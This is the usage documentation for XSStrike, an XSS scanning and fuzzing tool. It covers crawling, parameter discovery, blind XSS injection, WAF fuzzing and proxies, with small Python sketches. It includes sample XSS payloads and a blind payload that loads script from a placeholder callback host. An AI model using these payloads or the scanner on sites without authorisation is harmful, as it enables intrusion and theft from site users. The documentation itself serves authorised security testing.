Somdev Sangwan edited this page Apr 12, 2019 · 24 revisions
usage: [-h] [-u TARGET] [--data DATA] [-t THREADS] [--seeds SEEDS] [--json] [--path]
                   [--fuzzer] [--update] [--timeout] [--params] [--crawl] [--blind]
                   [--skip-dom] [--headers] [--proxy] [-d DELAY] [-e ENCODING]

optional arguments:
  -h, --help            show this help message and exit
  -u, --url             target url
  --data                post data
  -f, --file            load payloads from a file
  -t, --threads         number of threads
  -l, --level           level of crawling
  -e, --encode          payload encoding
  --json                treat post data as json
  --path                inject payloads in the path
  --seeds               load urls from a file as seeds
  --fuzzer              fuzzer
  --update              update
  --timeout             timeout
  --params              find params
  --crawl               crawl
  --proxy               use prox(y|ies)
  --blind               inject blind xss payloads while crawling
  --skip                skip confirmation dialogue and poc
  --skip-dom            skip dom checking
  --headers             add headers
  -d, --delay           delay between requests

Scan a single URL

Option: -u or --url

Test a single webpage that uses the GET method.

python -u ""

Supplying POST data

python -u "" --data "q=query"

Testing URL path components

Option: --path

If you want to inject payloads in the URL path, like <payload>, you can do that with the --path switch.

python -u "" --path

Treat POST data as JSON

Option: --json

This switch can be used to test JSON data via POST method.

python -u "" --data '{"q":"query"} --json'


Crawling

Option: --crawl

Crawl the target webpage for more targets and test them.

python -u "" --crawl

Crawling depth

Option: -l or --level | Default: 2

This option lets you specify the depth of crawling.

python -u "" --crawl -l 3

Testing/Crawling URLs from a file

Option: --seeds

If you want to test URLs from a file or just simply want to add seeds for crawling, you can use the --seeds option.

python --seeds urls.txt


python -u "" -l 3 --seeds urls.txt

Bruteforce payloads from a file

Option: -f or --file

You can load payloads from a file and check if they work. XSStrike will not perform any analysis in this mode.

python3 -u "" -f /path/to/file.txt

Using default as the file path will load XSStrike's default payloads.
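In spirit, this mode reads one payload per line and checks whether each appears verbatim in the response — no analysis. A rough sketch under those assumptions (the reflection check and file layout are illustrative, not XSStrike's code):

```python
import os
import tempfile

# Write a tiny payload list: one payload per line, blank lines ignored.
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
    f.write("<script>alert(1)</script>\n\n<svg onload=alert(1)>\n")
    path = f.name

with open(path) as f:
    payloads = [line.strip() for line in f if line.strip()]
os.unlink(path)

# Naive check: a payload "works" here if it is reflected unmodified.
response_text = "<p>you searched for <svg onload=alert(1)></p>"
working = [p for p in payloads if p in response_text]
```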

Find hidden parameters

Option: --params

Find hidden parameters by parsing HTML & bruteforcing.

python -u "" --params

Number of threads

Option: -t or --threads | Default: 2

It is possible to make concurrent requests to the target while crawling and -t option can be used to specify the number of concurrent requests to make. While threads can help to speed up crawling, they might also trigger security mechanisms. A high number of threads can also bring down small websites.

python -u "" -t 10 --crawl -l 3


Timeout

Option: --timeout | Default: 7

It is possible to specify a number of seconds to wait before considering the HTTP(S) request timed out.

python -u "" --timeout=4


Delay between requests

Option: -d or --delay | Default: 0

It is possible to specify a number of seconds to wait between each HTTP(S) request. The value must be an integer; for instance, 1 means one second.

python -u "" -d 2

Supply HTTP headers

Option: --headers

This option will open your text editor (default is 'nano') and you can simply paste your HTTP headers and press Ctrl + S to save.

[headers demo screenshot]

If your operating system doesn't support this or you don't want to do this anyway, you can simply add headers from command line separated by \n as follows: python -u --headers "Accept-Language: en-US\nCookie: null"
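A \n-separated header string like the one above has to be split into name/value pairs before it can be attached to requests. XSStrike's own parsing isn't shown here; `parse_headers` is a hypothetical sketch of the idea:

```python
def parse_headers(raw):
    """Turn 'Name: value\\nName2: value2' (with a literal backslash-n) into a dict."""
    headers = {}
    for line in raw.replace("\\n", "\n").splitlines():
        if ":" in line:
            name, _, value = line.partition(":")
            headers[name.strip()] = value.strip()
    return headers

# The shell passes \n through as a literal backslash + n, hence the escaping.
hdrs = parse_headers("Accept-Language: en-US\\nCookie: null")
```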

Blind XSS

Option: --blind

Using this option while crawling will make XSStrike inject your blind XSS payload, defined in core/, into every parameter of every HTML form.

python -u --crawl --blind
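Conceptually, blind injection just sets every discovered form parameter to your callback payload and submits the form. A hypothetical sketch — the payload string, callback host, and `blind_fill` helper are all placeholders, not XSStrike's actual values:

```python
# Hypothetical blind payload; in practice it points at your own callback
# endpoint (e.g. an XSS hunter instance) and is configured in core/.
BLIND = '"><script src=//your-callback.example></script>'

def blind_fill(form_params):
    """Set every discovered form parameter to the blind payload."""
    return {name: BLIND for name in form_params}

data = blind_fill(["q", "email", "comment"])
```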

Payload Encoding

Option: -e or --encode

XSStrike can encode payloads on demand. Following encodings are supported as of now:

  • base64

python -u "" -e base64

Want an encoding to be supported? Open an issue.


Fuzzer

Option: --fuzzer

The fuzzer is meant to test filters and Web Application Firewalls. It is painfully slow because it sends randomly delayed requests, and the delay can be up to 30 seconds. To minimize the delay, set it to 1 second using the -d option.

python -u "" --fuzzer


Logging

Option: --console-log-level | Default: INFO

It is possible to choose a minimum logging level to display xsstrike logs in the console: python -u "" --console-log-level WARNING

Option: --file-log-level | Default: None

If specified, xsstrike will also write all logs of the given level or higher to a file: python -u "" --file-log-level DEBUG

Option: --log-file | Default: xsstrike.log

Name of the file where logs will be stored. Note that if --file-log-level is not specified, this option will not have any effect. python -u "" --file-log-level INFO --log-file output.log
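Independent console and file thresholds map directly onto Python's standard logging handlers. A self-contained sketch of that pattern (in-memory streams stand in for the console and --log-file; this is not XSStrike's logging code):

```python
import io
import logging

log = logging.getLogger("xsstrike-demo")
log.setLevel(logging.DEBUG)

console = logging.StreamHandler(io.StringIO())
console.setLevel(logging.INFO)        # like --console-log-level INFO

file_stream = io.StringIO()           # stands in for --log-file
file_handler = logging.StreamHandler(file_stream)
file_handler.setLevel(logging.DEBUG)  # like --file-log-level DEBUG

log.addHandler(console)
log.addHandler(file_handler)

log.debug("only reaches the file handler")
log.warning("reaches both handlers")
```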

Using Proxies

Option: --proxy

You have to set up your prox(y|ies) in core/ and then you can use the --proxy switch to use them whenever you want.
More information on setting up proxies can be found here.

python -u "" --proxy

Skip Confirmation Prompt

Option: --skip

If you want XSStrike to continue the scan without asking for confirmation once a working payload is found, use this option. It will skip PoC generation as well.

python -u "" --skip

Skip DOM Scanning

Option: --skip-dom

You may want to skip DOM XSS scanning while crawling to save time.

python -u "" --skip-dom


Updating

Option: --update

If this option is enabled, XSStrike will check for updates. If a newer version is available, XSStrike will download and merge the updates into the current directory without overwriting other files.

python --update
